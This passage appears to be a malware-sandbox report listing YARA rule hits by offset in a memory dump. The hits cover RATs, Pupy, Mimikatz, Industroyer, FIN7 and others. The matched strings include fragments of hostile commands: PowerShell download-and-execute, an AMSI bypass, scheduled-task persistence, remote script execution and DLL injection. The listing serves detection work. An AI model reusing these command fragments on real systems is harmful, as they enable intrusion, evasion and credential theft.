- 0x11757:$x12: AntiSniff -a wireshark.exe
- 0x11777:$x13: c:\windows\keylog.txt
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | EternalRocks_taskhost | Detects EternalRocks Malware - file taskhost.exe | Florian Roth | - 0x19b25:$s1: sTargetIP
- 0x19b33:$s2: SERVER_2008R2_SP0
- 0x19b49:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51
- 0x19b76:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | BeyondExec_RemoteAccess_Tool | Detects BeyondExec Remote Access Tool - file rexesvr.exe | Florian Roth | - 0x38f6a:$x1: \BeyondExecV2\Server\Release\Pipes.pdb
- 0x38f95:$x2: \\.\pipe\beyondexec%d-stdin
- 0x38fb5:$x3: Failed to create dispatch pipe. Do you have another instance running?
- 0x39000:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40
- 0x39016:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Disclosed_0day_POCs_injector | Detects POC code from disclosed 0day hacktool set | Florian Roth | - 0x12926:$x1: \Release\injector.pdb
- 0x12940:$x2: Cannot write the shellcode in the process memory, error:
- 0x1297e:$x3: /s shellcode_file PID: shellcode injection.
- 0x129ae:$x4: /d dll_file PID: dll injection via LoadLibrary().
- 0x1297e:$x5: /s shellcode_file PID
- 0x129e4:$x5: /s shellcode_file PID
- 0x129fe:$x6: Shellcode copied in memory: OK
- 0x12a21:$x7: Usage of the injector.
- 0x12a3d:$x8: KO: cannot obtain the SeDebug privilege.
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | APT_PupyRAT_PY | Detects Pupy RAT | Florian Roth | - 0xa146:$x1: reflective_inject_dll
- 0xa1c7:$x1: reflective_inject_dll
- 0xa1e1:$x1: reflective_inject_dll
- 0x3b960:$x1: reflective_inject_dll
- 0x3b97a:$x2: ImportError: pupy builtin module not found !
- 0x3b9ab:$x3: please start pupy from either it's exe stub or it's reflective DLLR;
- 0xa19a:$x4: [INJECT] inject_dll.
- 0x3b9f4:$x4: [INJECT] inject_dll.
- 0x3ba0d:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))
- 0x3ba74:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OilRig_Strings_Oct17 | Detects strings from OilRig malware and malicious scripts | Florian Roth | - 0x6b9:$x1: %localappdata%\srvHealth.exe
- 0x6da:$x2: %localappdata%\srvBS.txt
- 0x6f7:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb
- 0x736:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb
- 0x777:$s3: .LoadDll("Run", arg, "C:\\Windows\\
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Suspicious_Script_Running_from_HTTP | Detects a suspicious | Florian Roth | - 0x9211:$s1: cmd /C script:http://
- 0x922b:$s2: cmd /C script:https://
- 0x9246:$s3: cmd.exe /C script:http://
- 0x9264:$s4: cmd.exe /C script:https://
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x906:$s5: TVqQAAMAAAAEAA
- 0xf74b:$s5: TVqQAAMAAAAEAA
- 0x3fd7:$a1: = CreateObject("Wscript.Shell")
- 0x3d725:$a1: = CreateObject("Wscript.Shell")
- 0x3df7d:$a1: = CreateObject("Wscript.Shell")
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Malware_1 | Detects Industroyer related malware | Florian Roth | - 0x170d5:$s1: haslo.exe
- 0x17136:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ...
- 0x17182:$x2: haslo.datCrash
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Portscan_3_Output | Detects Industroyer related custom port scaner output file | Florian Roth | - 0x16f5b:$s1: WSA library load complite.
- 0x16f7a:$s2: Connection refused
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Malware_4 | Detects Industroyer related malware | Florian Roth | - 0x17812:$s2: defragsvc
- 0x17820:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Malware_5 | Detects Industroyer related malware | Florian Roth | - 0x1796f:$x1: D2MultiCommService.exe
- 0x1798a:$x2: Crash104.dll
- 0x1799b:$x3: iec104.log
- 0x179aa:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u
- 0x179d7:$s1: Error while getaddrinfo executing: %d
- 0x17a01:$s2: return info-Remote command
- 0x17a20:$s3: Error killing process ...
- 0x17a3e:$s4: stop_comm_service_name
- 0x17a59:$s5: *1* Data exchange: Send: %d (%s)
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | redSails_PY | Detects Red Sails Hacktool - Python | Florian Roth | - 0x3b6d:$x1: Gained command shell on host
- 0x3b8e:$x2: [!] Received an ERROR in shell()
- 0x3bb3:$x3: Target IP address with backdoor installed
- 0x3be1:$x4: Open backdoor port on target machine
- 0x3c0a:$x5: Backdoor port to open on victim machine
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Rehashed_RAT_2 | Detects malware from Rehashed RAT incident | Florian Roth | - 0x747f:$x1: dalat.dulichovietnam.net
- 0x749c:$x2: web.Thoitietvietnam.org
- 0x74b8:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)
- 0x7502:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3
- 0x7587:$s1: GET /%s%s%s%s HTTP/1.1
- 0x75a2:$s2: http://%s:%d/%s%s%s%s
- 0x75bc:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Malware_QA_vqgk | VT Research QA uploaded malware - file vqgk.dll | Florian Roth | - 0xea16:$x3: %d is an x86 process (can't inject x64 content)
- 0x17f91:$x3: %d is an x86 process (can't inject x64 content)
- 0xe9e0:$s1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x17f5b:$s1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x17fc5:$s2: Could not open process token: %d (%u)
- 0xeac5:$s5: Failed to impersonate logged on user %d (%u)
- 0xea4a:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x17f0d:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x36:$s7: could not write to process memory: %d
- 0xea98:$s9: Failed to impersonate token from %d (%u)
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Pupy_Backdoor | Detects Pupy backdoor | Florian Roth | - 0xa08d:$x1: reflectively inject a dll into a process.
- 0xa0bb:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid
- 0xa0fc:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null
- 0xa146:$x4: reflective_inject_dll
- 0xa1c7:$x4: reflective_inject_dll
- 0xa1e1:$x4: reflective_inject_dll
- 0x3b960:$x4: reflective_inject_dll
- 0xa0bb:$x5: ld_preload_inject_dll
- 0xa160:$x5: ld_preload_inject_dll
- 0xa17a:$x6: get_pupy_config() -> string
- 0xa19a:$x7: [INJECT] inject_dll. OpenProcess failed.
- 0xa146:$x8: reflective_inject_dll
- 0xa1c7:$x8: reflective_inject_dll
- 0xa1e1:$x8: reflective_inject_dll
- 0x3b960:$x8: reflective_inject_dll
- 0xa1e1:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
- 0xa224:$x10: linux_inject_main
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Microcin_Sample_5 | Malware sample mentioned in Microcin technical report by Kaspersky | Florian Roth | - 0x502e:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary
- 0x507a:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option>
- 0x50b9:$x3: The password is "%s" Time: %d(s)
- 0x50e6:$x4: The password is " %s " Time: %d(s)
- 0x5115:$x5: No password found!
- 0x512c:$x7: Can not found the Password Dictoonary file!
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | clearlog | Detects Fireball malware - file clearlog.dll | Florian Roth | - 0x1942d:$x1: \ClearLog\Release\logC.pdb
- 0x19472:$s2: logC.dll
- 0x1949b:$s5: Logger Name:
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf21c:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf3e7:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0xf412:$x2: script:https://www.dropbox.com
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0x7e06:$s1: mshtml,RunHTMLApplication
- 0xf58b:$s1: mshtml,RunHTMLApplication
- 0xf5a9:$s2: new ActiveXObject("WScript.Shell").Run(
- 0xf5d5:$s3: /c start mshta j
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0x8e2e:$s1: w = new ActiveXObject(
- 0x8e49:$s2: w.Run(r);
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x2cf62:$s2: Auditcleaner
- 0x2cfc9:$s2: Auditcleaner
- 0x3276e:$s11: elatedmonkey
- 0x327e2:$s11: elatedmonkey
- 0x2d578:$s17: ys.ratload.sh
- 0x2bccd:$elf4: charm_saver
- 0x2f51d:$elf8: ebbshave
- 0x2f585:$elf8: ebbshave
- 0x2f7bb:$elf9: eggbasket
- 0x2f824:$elf9: eggbasket
- 0x31a3c:$elf12: envoytomato
- 0x31aa2:$elf12: envoytomato
- 0x31827:$elf14: estopmoonlit
- 0x3188e:$elf14: estopmoonlit
- 0x33089:$elf17: ghost_sparc
- 0x33106:$elf17: ghost_sparc
- 0x30e1e:$elf18: jackpop
- 0x30e85:$elf18: jackpop
- 0x2a8c4:$elf19: orleans_stride
- 0x2ae50:$elf21: seconddate
- 0x2bccd:$pe2: charm_saver
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Ysoserial_Payload_Spring1 | Ysoserial Payloads - file Spring1.bin | Florian Roth | - 0x3ea43:$x1: ysoserial/Pwner
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Ysoserial_Payload | Ysoserial Payloads | Florian Roth | - 0x3eb98:$x1: ysoserial/payloads/
- 0x3ebb0:$s1: StubTransletPayload
- 0x3ebc8:$s2: Pwnrpw
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Ysoserial_Payload_3 | Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin | Florian Roth | - 0x3ed4d:$x1: ysoserialq
- 0x3ed5c:$s1: targetClassInterceptorMetadatat
- 0x3ed80:$s2: targetInstancet
- 0x3ed94:$s3: targetClassL
- 0x3eda5:$s4: POST_ACTIVATEsr
- 0x3edb9:$s5: PRE_DESTROYsq
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | CACTUSTORCH | Detects CactusTorch Hacktool | Florian Roth | - 0xc84c:$x1: $payload = shellcode(%options["listener"], "true", "x86");
- 0xc88b:$x2: Copy the base64 encoded payload into the code variable below.
- 0xc8ee:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
- 0xc94e:$x5: ' Author: Vincent Yiu (@vysecurity)
- 0xc976:$x6: Dim binary : binary = "rundll32.exe"
- 0xc99f:$a1: code = code & "
- 0xc9b3:$a2: serialized_obj = serialized_obj & "
- 0xc983:$s1: binary = "rundll32.exe"
- 0xc9db:$s1: binary = "rundll32.exe"
- 0xca4c:$s1: binary = "rundll32.exe"
- 0xc9f7:$s2: EL.DataType = "bin.hex"
- 0xca13:$s3: Set stm = CreateObject("System.IO.MemoryStream")
- 0xca48:$s4: var binary = "rundll32.exe";
- 0xca69:$s5: var serialized_obj = "
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth | - 0x340c6:$s1: DoUploadAndExecute
- 0x340dd:$s2: DoDownloadAndExecute
- 0x340f6:$s3: DoShellExecute
- 0x34109:$s4: set_Processname
- 0x3411e:$op1: 04 1E FE 02 04 16 FE 01 60
- 0x3412d:$op2: 00 17 03 1F 20 17 19 15 28
- 0x3413c:$op3: 00 04 03 69 91 1B 40
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth | - 0x3428e:$x1: GetKeyloggerLogsResponse
- 0x342ab:$x2: get_Keylogger
- 0x342bd:$x3: HandleGetKeyloggerLogsResponse
- 0x342e0:$s1: DoShellExecuteResponse
- 0x342fb:$s2: GetPasswordsResponse
- 0x34314:$s3: GetStartupItemsResponse
- 0x34330:$s4: <GetGenReader>b__7
- 0x34347:$s5: RunHidden
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_Malware_2 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x3713a:$x1: sERvEr.Dll
- 0x3715a:$x3: .?AVCKeyLoggerManager@@
- 0x37176:$x4: GH0STCZH
- 0x371df:$s3: \Release\Loader.pdb
- 0x37266:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B
- 0x3727c:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9
- 0x37292:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_Malware_3 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x37429:$s6: operator ""
- 0x37830:$s6: operator ""
- 0x38000:$s6: operator ""
- 0x36f5c:$s7: zok]\\\ZZYYY666564444
- 0x3743a:$s7: zok]\\\ZZYYY666564444
- 0x38033:$s7: zok]\\\ZZYYY666564444
- 0x3b347:$s7: zok]\\\ZZYYY666564444
- 0x37455:$s11: InvokeMainViaCRT
- 0x37841:$s11: InvokeMainViaCRT
- 0x3746b:$s12: .?AVAES@@
- 0x37857:$s12: .?AVAES@@
- 0x3747a:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32
- 0x37490:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03
- 0x374a6:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_Malware_5 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x379e7:$x1: CWINDOWSSYSTEMROOT
- 0x379fe:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK
- 0x37a23:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY
- 0x37a43:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU
- 0x37a61:$s7: FALLINLOVE
- 0x37a71:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_WmiDLL_inMemory | Malware related to Operation Cloud Hopper - Page 25 | Florian Roth | - 0x35b31:$s1: wmi.dll 2>&1
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | VBS_WMIExec_Tool_Apr17_1 | Tools related to Operation Cloud Hopper | Florian Roth | - 0x36c21:$x1: strNetUse = "cmd.exe /c net use \\" & host
- 0x36c50:$x2: localcmd = "cmd.exe /c " & command
- 0x36c78:$x3: & " > " & TempFile & " 2>&1" '2>&1 err
- 0x36ca4:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err
- 0x36cf1:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll"
- 0x36d39:$a1: WMIEXEC ERROR: Command ->
- 0x36d58:$a2: WMIEXEC : Command result will output to
- 0x36d84:$a3: WMIEXEC : Target ->
- 0x36d9c:$a4: WMIEXEC : Login -> OK
- 0x36db6:$a5: WMIEXEC : Process created. PID:
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | RevengeRAT_Sep17 | Detects RevengeRAT malware | Florian Roth | - 0x790c:$x1: Nuclear Explosion.g.resources
- 0x795b:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41
- 0x7988:$x5: \RevengeRAT\
- 0x7999:$x6: Revenge-RAT client has been successfully installed.
- 0x79d1:$x7: Nuclear Explosion.exe
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0x386de:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x38705:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x38748:$s3: MimiPenguin Results:
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | POSHSPY_Malware | Detects | Florian Roth | - 0xfbd6:$x1: function sWP($cN, $pN, $aK, $aI)
- 0xfbfb:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2
- 0xfc27:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',
- 0xfc77:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA
- 0xfca2:$x5: $exeRes = exePldRoutine
- 0xfcbe:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0xf74b:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0xf7c2:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | FIN7_Backdoor_Aug17 | Detects Word Dropper from Proofpoint FIN7 Report | Florian Roth | - 0xb761:$x1: wscript.exe //b /e:jscript C:\Users\
- 0xb78a:$x2: wscript.exe /b /e:jscript C:\Users\
- 0xb7b2:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe
- 0xb7ff:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore
- 0xb839:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore
- 0xb872:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt
- 0xb8a1:$s1: /?page=wait
- 0xb8b1:$a1: autoit3.exe
- 0xb8c1:$a2: dumpcap.exe
- 0xb8d1:$a3: tshark.exe
- 0xb8e0:$a4: prl_cc.exe
- 0xb8ef:$v1: vmware
- 0xb8fa:$v2: PCI\\VEN_80EE&DEV_CAFE
- 0xb915:$v3: VMWVMCIHOSTDEV
- 0xb928:$c1: apowershell
|